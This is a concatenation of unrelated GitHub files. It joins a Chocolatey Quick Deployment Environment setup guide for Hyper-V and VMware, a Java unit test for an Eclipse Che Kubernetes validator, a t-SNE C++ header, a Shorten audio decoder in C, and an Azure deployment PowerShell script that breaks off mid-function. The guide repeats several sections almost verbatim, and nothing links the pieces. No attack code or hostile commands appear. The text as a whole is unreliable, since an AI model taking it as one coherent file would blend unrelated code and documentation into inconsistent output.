4. Windows 10 and Windows Server 2016/2019 versions of Hyper-V now come with built-in support for Hyper-V Integration Services, as they automatically get pushed to guest VMs. In older versions of Hyper-V, you should see an option to "Insert Integration Services Setup Disk". You can use this option to install and enable Hyper-V Integration Services.

Video Summary:

![QDE Hyper-V Appliance Import](images/quickdeploy/QDE-hypervapp.gif)

### Platform: Hyper-V (VHD file)

1. Download the VHD from the provided link, and unzip it to the directory you wish to store it in.
2. Increase the size of the VHD, for example to 500GB. Increase to what you feel comfortable with.

   ```powershell
   # This only increases the available size of the image
   # You will still need to increase the space for the C drive
   Resize-VHD -Path 'C:\path\to\QuickDeploy Environment.vhd' -Size 500GB
   ```

3. Open Hyper-V Manager.
4. Create a new VM.
5. If prompted, choose a `Generation 1` virtual machine option.
6. Set startup memory to `8192 MB` (you can specify this later as well).
7. When asked to create a new disk or use an existing one, select the `Use existing virtual disk` option and browse to the VHD you unzipped in Step 1.
8. Adjust the hardware specifications of the VM. For a performant system, the following are recommended:
   - 4 vCPUs
   - 8 GB RAM
9. Windows 10 and Windows Server 2016/2019 versions of Hyper-V now come with built-in support for Hyper-V Integration Services, as they automatically get pushed to guest VMs. In older versions of Hyper-V, you should see an option to `Insert Integration Services Setup Disk`. You can use this option to install and enable Hyper-V Integration Services.

Video Summary:

![QDE Hyper-V VHD](images/quickdeploy/QDE-hyperv.gif)

### Platform: VMware (VMDK file)

1. Download the VMDK from the provided link, and unzip it to the directory you wish to store it in.
2. For ESX/ESXi, open vSphere and upload the downloaded VMDK to your datastore.
3. Create a new VM.
4. When prompted for OS type, choose `Windows Server 2019` (if available), or `Windows Server 2016 or later`.
5. If prompted for boot firmware, choose `Legacy BIOS` (**not** UEFI).
6. When asked to create a new disk or attach an existing one, delete the default disk, select attach, and browse to the VMDK you uploaded. **IMPORTANT**: [vCenter/ESX/ESXi] You **must** select an `IDE controller` under the "Controller Location" setting of the disk. If you leave the controller as SCSI (default), your VM will not boot.
7. Adjust the hardware specifications of the VM. For a performant system, the following are recommended:
   - 4 vCPUs
   - 8 GB RAM
8. Once you click Finish, go back into the `Edit settings` context menu for the VM, and expand the disk you attached to 500GB (double-check in the OS, and extend if needed). **NOTE**: you will likely need to allocate the additional space to the C drive.
9. Boot up the VM, and install VMware Tools using the console menus (this will require a reboot).

Video Summary:

* VMware ESX/i: ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-esx.gif)
* VMware Fusion (Mac OS): ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-fusion.gif)

### Platform: VMware (OVF template)

> :warning: **WARNING**
>
> The OVF import method can be tricky. Unless you have the **exact** same network settings as the host where the OVF was exported, you will likely run into failures on attempts to import it. You _could_ work around this by creating your own VM first, exporting the OVF file, using the Network settings from this file to replace the 2 sections of Network settings in the OVF of QDE, and then attempting to import the OVF for QDE. However, we realize this process is cumbersome, and would **strongly** advise you to utilize the VMDK import method above for greatest compatibility. We are working to improve this process, but as of right now, the OVF method is to be used at your own risk.

1. Download the OVF file and unzip it to the directory you wish to store it in.
2. Review the instructions for deploying a VM from an OVF file [here](https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.html.hostclient.doc/GUID-FBEED81C-F9D9-4193-BDCC-CC4A60C20A4E_copy.html).
3. Adjust the settings of the newly imported VM to our recommended:
   - 4 vCPUs
   - 8 GB RAM
4. Install VMware Tools on the VM once booted (this will require a reboot).

### Platform: Other

Most likely you are going to download the VMDK file and convert it to your platform. Please reach out to support to see what options are available.

___

## Step 2: Other Considerations for Virtual Environment

### Step 2.1: DNS Settings

The QDE environment is configured by default to use DHCP for easier initial setup. You will likely need to reconfigure it with a static IP address, depending on your organization's policies (a sketch of one way to do this follows below).
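If your policies call for a static address, something along these lines should work from an elevated PowerShell session inside the VM. This is a minimal sketch: the interface alias, IP addresses, and DNS servers shown are placeholders, so substitute values from your own network.

```powershell
# Placeholder values throughout - replace with details from your network team
New-NetIPAddress -InterfaceAlias 'Ethernet' -IPAddress 192.168.1.50 -PrefixLength 24 -DefaultGateway 192.168.1.1
Set-DnsClientServerAddress -InterfaceAlias 'Ethernet' -ServerAddresses 192.168.1.10, 192.168.1.11
```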
8. Once you click Finish, go back into the `Edit settings` context menu for the VM, and expand the disk you attached to 500GB (double-check in the OS, and extend if needed). **NOTE**: you will likely need to allocate the additional space to the C drive.
9. Boot up the VM, and install VMware Tools using the console menus (this will require a reboot).

Video Summary:

* VMware ESX/i: ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-esx.gif)
* VMware Fusion (Mac OS): ![QDE VMware VMDK](images/quickdeploy/QDE-vmdk-fusion.gif)

### Platform: VMware (OVF template)

> :warning: **WARNING**
>
> The OVF import method can be tricky. Unless you have the **exact** same network settings as the host where the OVF was exported, you will likely run into failures on attempts to import it. You _could_ work around this by creating your own VM first, exporting the OVF file, using the network settings from this file to replace the two sections of network settings in the OVF of QDE, and then attempting to import the OVF for QDE. However, we realize this process is cumbersome, and would **strongly** advise that you use the VMDK import method above for greatest compatibility. We are working to improve this process, but as of right now, the OVF method is to be used at your own risk.

1. Download the OVF file and unzip it to the directory you wish to store it in.
2. Review the instructions for deploying a VM from an OVF file [here](https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.html.hostclient.doc/GUID-FBEED81C-F9D9-4193-BDCC-CC4A60C20A4E_copy.html).
3. Adjust the settings of the newly imported VM to our recommended specifications:
    - 4 vCPUs
    - 8 GB RAM
4. Install VMware Tools on the VM once booted (this will require a reboot).

### Platform: Other

Most likely you are going to download the VMDK file and convert it to your platform. Please reach out to support to see what options are available.

___
## Step 2: Other Considerations for Virtual Environment

### Step 2.1: DNS Settings

The QDE environment is configured by default to use DHCP for easier initial setup. You will likely need to reconfigure it with a static IP address, depending on your organization's policies.

___
## Step 3: Virtual Environment Setup

On the desktop of your QDE VM, there is a `Readme.html` file that will guide you through the rest of the setup process once you are logged in. A version of this readme file can be found in the [[Quick Deployment Desktop Readme|QuickDeploymentDesktopReadme]].

> :memo: **NOTE**: The online version is likely more up to date than the readme you will find on the desktop (not including redacted items like credentials). If there are conflicts between the desktop readme and what you see online, prefer the online version.

> :warning: **WARNING**: If you have an existing corporate environment you will be servicing with the QDE VM, be sure to perform your organization-specific initial configuration **_before_** running setup scripts.

### Step 3.1: Expand Disk Size

On the machine, please check the size of the C drive. If the volume needs to be expanded, expand it to the space you've allocated for the machine by running this command in an administrative PowerShell console:

```powershell
# This should increase the space available on the C drive.
Resize-Partition -DriveLetter C -Size ((Get-PartitionSupportedSize -DriveLetter C).SizeMax)
```

Alternatively, you can use the Disk Management utility to expand the disk, if a GUI is preferred.
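If you want to confirm there is unallocated space to claim before resizing, a minimal check (assuming the system volume is `C:`, as above) is to compare the current partition size against the maximum supported size:

```powershell
# If SizeMax is noticeably larger than the current size, there is space to claim.
$current = (Get-Partition -DriveLetter C).Size
$max     = (Get-PartitionSupportedSize -DriveLetter C).SizeMax
"C: is {0:N1} GB of a possible {1:N1} GB" -f ($current / 1GB), ($max / 1GB)
```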
### Step 3.2: Add License File to QDE

The [[Quick Deployment Desktop Readme|QuickDeploymentDesktopReadme]] will ask you to use your license file, which comes from an external location. It is best to copy the file into QDE as a whole file, but you may first need to set up whatever file-copy or clipboard integration your virtualization platform makes available for that.

> :warning: **WARNING**
>
> If you find that you need to copy the text and paste the license file text into a new file in QDE, the file format and name are extremely important to get right. If the file is not saved as UTF-8, or a stray space is inserted, Chocolatey will consider it invalid.
> Please contact support if you need help here.

### Step 3.3: Regenerate SSL Certificates

See [[QDE SSL/TLS Setup|QuickDeploymentSslSetup]].

### Step 3.4: Database Password Changes (Optional)

The database credentials are currently pre-set. If you would like to change the credentials associated with the database, you will need to follow these steps.

1. Change the database access credentials.
2. Reinstall the chocolatey-management-service package:

    ```powershell
    choco uninstall chocolatey-management-service -y
    choco install chocolatey-management-service -y --package-parameters-sensitive="'/ConnectionString=""Server=localhost\SQLEXPRESS;Database=ChocolateyManagement;User ID=ChocoUser;Password=NewPassword;""'"
    ```

3. Reinstall the chocolatey-management-web package:

    ```powershell
    choco uninstall chocolatey-management-web -y
    choco install chocolatey-management-web -y --package-parameters-sensitive="'/ConnectionString=""Server=localhost\SQLEXPRESS;Database=ChocolateyManagement;User ID=ChocoUser;Password=NewPassword;""'"
    ```

___
## Step 4: Firewall Changes

See [[QDE Firewall Changes|QuickDeploymentFirewallChanges]].

___
## Step 5: Install and Configure Chocolatey on Clients

See [[QDE Client Setup|QuickDeploymentClientSetup]].

___
## FAQ

### How do I upgrade QDE?

While we will continue to make improvements to the QDE, there is no upgrade path for the virtual machine itself. You can choose to start over with a newer version, but that is rarely necessary: it is simple to upgrade the individual components, and that is how we recommend upgrading aspects of QDE. Should you want to upgrade, say, Central Management, you can follow the Central Management upgrade steps at [[Upgrade Central Management|CentralManagementSetupUpgrade]].

___
[[Quick Deployment Environment|QuickDeploymentEnvironment]]
{ "pile_set_name": "Github" }
/*
 * Copyright (c) 2012-2018 Red Hat, Inc.
 * This program and the accompanying materials are made
 * available under the terms of the Eclipse Public License 2.0
 * which is available at https://www.eclipse.org/legal/epl-2.0/
 *
 * SPDX-License-Identifier: EPL-2.0
 *
 * Contributors:
 *   Red Hat, Inc. - initial API and implementation
 */
package org.eclipse.che.workspace.infrastructure.kubernetes.environment;

import static org.mockito.Mockito.verify;

import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.testng.MockitoTestNGListener;
import org.testng.annotations.Listeners;
import org.testng.annotations.Test;

/**
 * Tests {@link KubernetesEnvironmentValidator}.
 *
 * @author Sergii Leshchenko
 */
@Listeners(MockitoTestNGListener.class)
public class KubernetesEnvironmentValidatorTest {
  @Mock private KubernetesEnvironmentPodsValidator podsValidator;

  @Mock private KubernetesEnvironment kubernetesEnvironment;

  @InjectMocks private KubernetesEnvironmentValidator environmentValidator;

  @Test
  public void shouldPerformChecksOnEnvironmentValidation() throws Exception {
    // when
    environmentValidator.validate(kubernetesEnvironment);

    // then
    // verify that validation was delegated to the pods validator
    verify(podsValidator).validate(kubernetesEnvironment);
  }
}
{ "pile_set_name": "Github" }
/* * * Copyright (c) 2014, Laurens van der Maaten (Delft University of Technology) * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Delft University of Technology. * 4. Neither the name of the Delft University of Technology nor the names of * its contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY LAURENS VAN DER MAATEN ''AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL LAURENS VAN DER MAATEN BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING * IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY * OF SUCH DAMAGE. * */ #ifndef TSNE_H #define TSNE_H static inline double sign(double x) { return (x == .0 ? .0 : (x < .0 ? -1.0 : 1.0)); } class TSNE { public: void run(double* X, int N, int D, double* Y, int no_dims, double perplexity, double theta); bool load_data(double** data, int* n, int* d, int* no_dims, double* theta, double* perplexity, int* rand_seed); void save_data(double* data, int* landmarks, double* costs, int n, int d); void symmetrizeMatrix(unsigned int** row_P, unsigned int** col_P, double** val_P, int N); // should be static! private: void computeGradient(double* P, unsigned int* inp_row_P, unsigned int* inp_col_P, double* inp_val_P, double* Y, int N, int D, double* dC, double theta); void computeExactGradient(double* P, double* Y, int N, int D, double* dC); double evaluateError(double* P, double* Y, int N, int D); double evaluateError(unsigned int* row_P, unsigned int* col_P, double* val_P, double* Y, int N, int D, double theta); void zeroMean(double* X, int N, int D); void computeGaussianPerplexity(double* X, int N, int D, double* P, double perplexity); void computeGaussianPerplexity(double* X, int N, int D, unsigned int** _row_P, unsigned int** _col_P, double** _val_P, double perplexity, int K); void computeSquaredEuclideanDistance(double* X, int N, int D, double* DD); double randn(); }; #endif
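/*
 * Usage sketch (illustrative, not part of the original header). A
 * hypothetical driver for the run() entry point declared above; the
 * sizes N and D, the perplexity (30.0), and theta (0.5) are assumptions
 * chosen only for illustration:
 *
 *     #include <vector>
 *
 *     int N = 1000, D = 50;            // N points of dimensionality D
 *     std::vector<double> X(N * D);    // row-major input data, filled elsewhere
 *     std::vector<double> Y(N * 2);    // receives the N x 2 embedding
 *
 *     TSNE tsne;
 *     tsne.run(X.data(), N, D, Y.data(), 2, 30.0, 0.5);
 */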
{ "pile_set_name": "Github" }
/* * Shorten decoder * Copyright (c) 2005 Jeff Muizelaar * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /** * @file shorten.c * Shorten decoder * @author Jeff Muizelaar * */ #include "bitstream.h" #include "golomb.h" #include "shndec.h" #include "codeclib.h" #define ULONGSIZE 2 #define WAVE_FORMAT_PCM 0x0001 #define TYPESIZE 4 #define CHANSIZE 0 #define LPCQSIZE 2 #define ENERGYSIZE 3 #define BITSHIFTSIZE 2 #define TYPE_S16HL 3 /* signed 16 bit shorts: high-low */ #define TYPE_S16LH 5 /* signed 16 bit shorts: low-high */ #define NWRAP 3 #define NSKIPSIZE 1 #define LPCQUANT 5 #define V2LPCQOFFSET (1 << LPCQUANT) #define FNSIZE 2 #define VERBATIM_CKSIZE_SIZE 5 #define VERBATIM_BYTE_SIZE 8 #define CANONICAL_HEADER_SIZE 44 #define MKTAG(a,b,c,d) (a | (b << 8) | (c << 16) | (d << 24)) #define get_le16(gb) bswap_16(get_bits_long(gb, 16)) #define get_le32(gb) bswap_32(get_bits_long(gb, 32)) /* converts fourcc string to int */ static unsigned int ff_get_fourcc(const char *s){ //assert( strlen(s)==4 ); return (s[0]) + (s[1]<<8) + (s[2]<<16) + (s[3]<<24); } static unsigned int get_uint(ShortenContext *s, int k) { if (s->version != 0) k = get_ur_golomb_shorten(&s->gb, ULONGSIZE); return get_ur_golomb_shorten(&s->gb, k); } #if defined(CPU_COLDFIRE) static inline void coldfire_lshift_samples(int n, int shift, int32_t *samples) { /* for (i = 0; i < n; i++) samples[i] =<< shift; */ asm volatile ( "move.l %[n], %%d0 \n" /* d0 = loop counter */ "asr.l #2, %%d0 \n" "beq 1f \n" "2:" /* main loop (unroll by 4) */ "movem.l (%[x]), %%d4-%%d7 \n" "asl.l %[s], %%d4 \n" "asl.l %[s], %%d5 \n" "asl.l %[s], %%d6 \n" "asl.l %[s], %%d7 \n" "movem.l %%d4-%%d7, (%[x]) \n" "lea.l (16, %[x]), %[x] \n" "subq.l #1, %%d0 \n" "bne 2b \n" "1:" /* any loops left? */ "and.l #3, %[n] \n" "beq 4f \n" "3:" /* remaining loops */ "move.l (%[x]), %%d4 \n" "asl.l %[s], %%d4 \n" "move.l %%d4, (%[x])+ \n" "subq.l #1, %[n] \n" "bne 3b \n" "4:" /* exit */ : [n] "+d" (n), [x] "+a" (samples) : [s] "d" (shift) : "%d0", "%d4", "%d5", "%d6", "%d7", "cc", "memory" ); } #endif static inline void fix_bitshift(ShortenContext *s, int32_t *samples) { int i; /* Wrapped samples don't get bitshifted, so we'll do them during the next iteration. 
 */
    if (s->bitshift != 0) {
#if defined(CPU_COLDFIRE)
        coldfire_lshift_samples(s->blocksize, s->bitshift, samples - s->nwrap);
#else
        for (i = -s->nwrap; i < (s->blocksize - s->nwrap); i++)
            samples[i] <<= s->bitshift;
#endif
    }

    /* Also, we have to remember to fix the wrapped samples when the
       bitshift changes. */
    if (s->bitshift != s->last_bitshift) {
        if (s->last_bitshift != 0)
            for (i = -s->nwrap; i < 0; i++)
                samples[i] <<= s->last_bitshift;
        s->last_bitshift = s->bitshift;
    }
}

static inline void decode_subframe_lpc(ShortenContext *s, int32_t *decoded,
                                       int residual_size, int pred_order)
{
    int sum, i, j;
    int coeffs[MAX_PRED_ORDER];

    for (i=0; i<pred_order; i++) {
        coeffs[i] = get_sr_golomb_shorten(&s->gb, LPCQUANT);
    }

    for (i=0; i < s->blocksize; i++) {
        sum = s->lpcqoffset;
        for (j=0; j<pred_order; j++)
            sum += coeffs[j] * decoded[i-j-1];
        decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + (sum >> LPCQUANT);
    }
}

static inline int shorten_decode_frame(ShortenContext *s,
                                       int32_t *decoded,
                                       int32_t *offset)
{
    int i;
    int32_t sum;
    int cmd = get_ur_golomb_shorten(&s->gb, FNSIZE);
    switch (cmd) {
        case FN_ZERO:
        case FN_DIFF0:
        case FN_DIFF1:
        case FN_DIFF2:
        case FN_DIFF3:
        case FN_QLPC:
        {
            int residual_size = 0;
            int32_t coffset;
            if (cmd != FN_ZERO) {
                residual_size = get_ur_golomb_shorten(&s->gb, ENERGYSIZE);
                /* this is a hack, as version 0 differed in the definition
                   of get_sr_golomb_shorten */
                if (s->version == 0)
                    residual_size--;
            }

            if (s->nmean == 0) {
                coffset = offset[0];
            } else {
                sum = (s->version < 2) ? 0 : s->nmean / 2;
                for (i=0; i<s->nmean; i++)
                    sum += offset[i];
                coffset = sum / s->nmean;
                if (s->version >= 2)
                    coffset >>= FFMIN(1, s->bitshift);
            }

            switch (cmd) {
                case FN_ZERO:
                    for (i=0; i<s->blocksize; i++)
                        decoded[i] = 0;
                    break;
                case FN_DIFF0:
                    for (i=0; i<s->blocksize; i++)
                        decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + coffset;
                    break;
                case FN_DIFF1:
                    for (i=0; i<s->blocksize; i++)
                        decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + decoded[i - 1];
                    break;
                case FN_DIFF2:
                    for (i=0; i<s->blocksize; i++)
                        decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + 2*decoded[i-1] - decoded[i-2];
                    break;
                case FN_DIFF3:
                    for (i=0; i<s->blocksize; i++)
                        decoded[i] = get_sr_golomb_shorten(&s->gb, residual_size) + 3*decoded[i-1] - 3*decoded[i-2] + decoded[i-3];
                    break;
                case FN_QLPC:
                {
                    int pred_order = get_ur_golomb_shorten(&s->gb, LPCQSIZE);
                    for (i=0; i<pred_order; i++)
                        decoded[i - pred_order] -= coffset;
                    decode_subframe_lpc(s, decoded, residual_size, pred_order);
                    if (coffset != 0) {
                        for (i=0; i < s->blocksize; i++)
                            decoded[i] += coffset;
                    }
                }
            }

            if (s->nmean > 0) {
                sum = (s->version < 2) ?
0 : s->blocksize / 2; for (i=0; i<s->blocksize; i++) sum += decoded[i]; for (i=1; i<s->nmean; i++) offset[i-1] = offset[i]; if (s->version < 2) { offset[s->nmean - 1] = sum / s->blocksize; } else { offset[s->nmean - 1] = (sum / s->blocksize) << s->bitshift; } } fix_bitshift(s, decoded); break; } case FN_VERBATIM: i = get_ur_golomb_shorten(&s->gb, VERBATIM_CKSIZE_SIZE); while (i--) get_ur_golomb_shorten(&s->gb, VERBATIM_BYTE_SIZE); break; case FN_BITSHIFT: s->bitshift = get_ur_golomb_shorten(&s->gb, BITSHIFTSIZE); break; case FN_BLOCKSIZE: s->blocksize = get_uint(s, av_log2(s->blocksize)); break; case FN_QUIT: break; default: return FN_ERROR; break; } return cmd; } int shorten_decode_frames(ShortenContext *s, int *nsamples, int32_t *decoded0, int32_t *decoded1, int32_t *offset0, int32_t *offset1, uint8_t *buf, int buf_size, void (*yield)(void)) { int32_t *decoded, *offset; int cmd; *nsamples = 0; init_get_bits(&s->gb, buf, buf_size*8); get_bits(&s->gb, s->bitindex); int n = 0; while (n < NUM_DEC_LOOPS) { int chan = n%2; if (chan == 0) { decoded = decoded0 + s->nwrap + *nsamples; offset = offset0; } else { decoded = decoded1 + s->nwrap + *nsamples; offset = offset1; } yield(); cmd = shorten_decode_frame(s, decoded, offset); if (cmd == FN_VERBATIM || cmd == FN_BITSHIFT || cmd == FN_BLOCKSIZE) { continue; } else if (cmd == FN_QUIT || cmd == FN_ERROR) { break; } *nsamples += chan * s->blocksize; n++; } if (*nsamples) { /* Wrap the samples for the next loop */ int i; for (i = 0; i < s->nwrap; i++) { decoded0[i] = decoded0[*nsamples + i]; decoded1[i] = decoded1[*nsamples + i]; } /* Scale the samples for the pcmbuf */ int scale = SHN_OUTPUT_DEPTH - s->bits_per_sample; #if defined(CPU_COLDFIRE) coldfire_lshift_samples(*nsamples, scale, decoded0 + s->nwrap); coldfire_lshift_samples(*nsamples, scale, decoded1 + s->nwrap); #else for (i = 0; i < *nsamples; i++) { decoded0[i + s->nwrap] <<= scale; decoded1[i + s->nwrap] <<= scale; } #endif } return cmd; } static int decode_wave_header(ShortenContext *s, uint8_t *header, int header_size) { GetBitContext hb; int len; init_get_bits(&hb, header, header_size*8); if (get_le32(&hb) != MKTAG('R','I','F','F')) { return -8; } int chunk_size = get_le32(&hb); if (get_le32(&hb) != MKTAG('W','A','V','E')) { return -9; } while (get_le32(&hb) != MKTAG('f','m','t',' ')) { len = get_le32(&hb); skip_bits(&hb, 8*len); } len = get_le32(&hb); if (len < 16) { return -10; } if (get_le16(&hb) != WAVE_FORMAT_PCM ) { return -11; } s->channels = get_le16(&hb); if (s->channels > MAX_CHANNELS) { return -3; } s->sample_rate = get_le32(&hb); skip_bits(&hb, 32); //s->bit_rate = 8*get_le32(&hb); int block_align = get_le16(&hb); s->totalsamples = (chunk_size - 36) / block_align; s->bits_per_sample = get_le16(&hb); if (s->bits_per_sample != 16) { return -12; } len -= 16; if (len > 0) { return len; } return 0; } int shorten_init(ShortenContext* s, uint8_t *buf, int buf_size) { int i; s->blocksize = DEFAULT_BLOCK_SIZE; s->channels = 1; s->nmean = -1; init_get_bits(&s->gb, buf, buf_size*8); get_bits(&s->gb, s->bitindex); /* shorten signature */ if (get_bits_long(&s->gb, 32) != bswap_32(ff_get_fourcc("ajkg"))) { return -1; } s->version = get_bits(&s->gb, 8); int internal_ftype = get_uint(s, TYPESIZE); if ((internal_ftype != TYPE_S16HL) && (internal_ftype != TYPE_S16LH)) { return -2; } s->channels = get_uint(s, CHANSIZE); if (s->channels > MAX_CHANNELS) { return -3; } /* get blocksize if version > 0 */ int maxnlpc = 0; if (s->version > 0) { s->blocksize = get_uint(s, 
av_log2(DEFAULT_BLOCK_SIZE)); maxnlpc = get_uint(s, LPCQSIZE); s->nmean = get_uint(s, 0); int skip_bytes = get_uint(s, NSKIPSIZE); for (i=0; i<skip_bytes; i++) { skip_bits(&s->gb, 8); } } if (s->nmean > MAX_NMEAN) { return -4; } s->nwrap = FFMAX(NWRAP, maxnlpc); if (s->nwrap > MAX_NWRAP) { return -5; } if (s->version > 1) s->lpcqoffset = V2LPCQOFFSET; if (get_ur_golomb_shorten(&s->gb, FNSIZE) != FN_VERBATIM) { return -6; } uint8_t header[MAX_HEADER_SIZE]; int header_size = get_ur_golomb_shorten(&s->gb, VERBATIM_CKSIZE_SIZE); if (header_size >= MAX_HEADER_SIZE || header_size < CANONICAL_HEADER_SIZE) { return -7; } for (i=0; i<header_size; i++) header[i] = (char)get_ur_golomb_shorten(&s->gb, VERBATIM_BYTE_SIZE); s->header_bits = s->gb.index; return decode_wave_header(s, header, header_size); }
{ "pile_set_name": "Github" }
param(
    [string] $ParamFile = "common.parameters.txt",
    [string] $subscriptionId,
    [string] $certPassword,
    [string] $sparkPassword,
    [string] $sparkSshPassword,
    [string] $sfPassword,
    [string] $resourceGroupName,
    [ValidatePattern('^[a-zA-Z0-9_.-]*$')]
    [ValidateLength(0, 40)]
    [string] $productName,
    [string] $resourceGroupLocation,
    [ValidateSet("EastUS", "SouthCentralUS", "NorthEurope", "WestEurope", "SoutheastAsia", "WestUS2", "CanadaCentral", "CentralIndia")]
    [string] $resourceLocationForMicrosoftInsights,
    [string] $resourceLocationForServiceFabric,
    [ValidateScript({Test-Path $_ })]
    [string] $deploymentCommonPath,
    [ValidateSet("y", "n")]
    [string] $generateAndUseSelfSignedCerts,
    [string] $mainCert,
    [string] $reverseProxyCert,
    [string] $sslCert,
    [ValidateSet("y", "n")]
    [string] $installModules,
    [ValidateSet("y", "n")]
    [string] $resourceCreation,
    [ValidateSet("y", "n")]
    [string] $sparkCreation,
    [ValidateSet("y", "n")]
    [string] $serviceFabricCreation,
    [ValidateSet("y", "n")]
    [string] $setupSecrets,
    [ValidateSet("y", "n")]
    [string] $setupCosmosDB,
    [ValidateSet("y", "n")]
    [string] $setupKVAccess
)

$user = [Security.Principal.WindowsIdentity]::GetCurrent();
$ret = (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)

if (!$ret) {
    Write-Host "The current command prompt session is not running as Administrator. Start command prompt by using the Run as Administrator option, and then try running the script again."
    Exit 50
}

$ErrorActionPreference = "stop"

Get-Content $ParamFile | Foreach-Object {
    $l = $_.Trim()
    if ($l.startsWith('#') -or $l.startsWith('//') -or !$l) {
        return
    }

    $var = $l.Split('=', 2)
    Set-Variable -Name $var[0] -Value $var[1]
}

if ($deployResources -ne 'y') {
    Write-Host "deployResources parameter value is not 'y'. This script will not execute."
    Exit 0
}

if ($generateNewSelfSignedCerts -eq 'n' -and !$certPassword) {
    Write-Host "Please provide certPassword to import the existing certs"
    Exit 40
}

Remove-Item -Path ".\cachedVariables" -Force -ErrorAction SilentlyContinue

$rootFolderPath = $PSScriptRoot
Import-Module "..\Deployment.Common\Helpers\UtilityModule" -ArgumentList $rootFolderPath, $resourceGroupName, $productName, $sparkClusterName, $randomizeProductName, $serviceFabricClusterName, $serviceAppName, $clientAppName, $sparkPassword, $sparkSshPassword, $sfPassword, $certPassword, $redisCacheSize -WarningAction SilentlyContinue

Set-Content -Path ".\cachedVariables" -NoNewline -Value $name

function Install-Modules {
    Write-Host -ForegroundColor Green "Checking Modules... "
    Write-Host -ForegroundColor Green "Estimated time to complete: 5 mins"
    Write-Host "Note: If any module is installed, you will have to close this prompt and restart deploy.bat as admin again... "

    $modules = New-Object 'System.Collections.Generic.Dictionary[String,String]'
    $modules.Add("azurerm", "6.13.1")
    $modules.Add("azuread", "2.0.2.4")
    $modules.Add("mdbc", "5.1.4")

    $moduleInstalled = $false

    # Make sure to install the correct required version of PS modules.
    # Since the Mdbc PS module doesn't support the New-MdbcQuery cmdlet from v6.0.0,
    # we have to make sure the correct Mdbc module is installed.
# https://github.com/nightroman/Mdbc/blob/master/Release-Notes.md#v600 $modules.Keys | foreach { if (!(Get-installedModule -name $_ -RequiredVersion $modules.Item($_) -ErrorAction SilentlyContinue )) { Write-Host "Install Module: " $_ $moduleInstalled = $true Install-Module -Name $_ -Force -AllowClobber -Scope CurrentUser -Repository PSGallery } } if ($moduleInstalled) { Write-Host -ForegroundColor Yellow "The script execution completed after one or more packages have been installed. In order to use the latest packages, please close this prompt, open a new command prompt as admin and run deploy.bat again" Exit 10 } else{ # Import correct version of PS modules. $modules.Keys | ForEach-Object { Write-Host "Importing Module: "$_" Version: "$modules.Item($_) Import-Module -Name $_ -RequiredVersion $modules.Item($_) -Force Write-Host "Imported Module: "$_" Version: "$modules.Item($_) } } } # Check if file paths exist function Check-FilePath { $notFound= $paths = @("$deploymentCommonPath\CosmosDB", "$deploymentCommonPath\Scripts", "$deploymentCommonPath\Resources") foreach ($p in $paths) { if (!(Test-Path $p)) { Write-Host "$p does not exist" Exit 20 } } } # Generate tokens with the actual values function Get-Tokens { $tokens = Get-DefaultTokens # Template $tokens.Add('subscriptionId', $subscriptionId ) $tokens.Add('resourceLocationForMicrosoftInsights', $resourceLocationForMicrosoftInsights ) $tokens.Add('tenantId', $tenantId ) $tokens.Add('userId', $userId ) $sparkType = 'hdinsight' $keyvaultPrefix = 'keyvault' $dataxJobTemplate = 'DataXDirect' $dataxKafkaJobTemplate = 'kafkaDataXDirect' $dataxBatchJobTemplate = 'DataXBatch' if ($useDatabricks -eq 'y') { $sparkType = 'databricks' $keyvaultPrefix = 'secretscope' $dataxJobTemplate = 'DataXDirectDatabricks' $dataxKafkaJobTemplate = 'kafkaDataXDirectDatabricks' $dataxBatchJobTemplate = 'DataXBatchDatabricks' $tokens.Add('databricksClusterSparkVersion', $databricksClusterSparkVersion) $tokens.Add('databricksClusterNodeType', $databricksClusterNodeType) $tokens.Add('databricksSku', $databricksSku) $tokens.Add('dbResourceGroupName', $resourceGroupName) } else { $tokens.Add('HDInsightVersion', $HDInsightVersion) $tokens.Add('sparkComponentVersion', $sparkComponentVersion) $tokens.Add('enableHDInsightAutoScaling', $enableHDInsightAutoScaling) if($enableHDInsightAutoScaling -eq 'y') { $tokens.Add('minNodesForHDInsightAutoScaling', $minNodesForHDInsightAutoScaling) 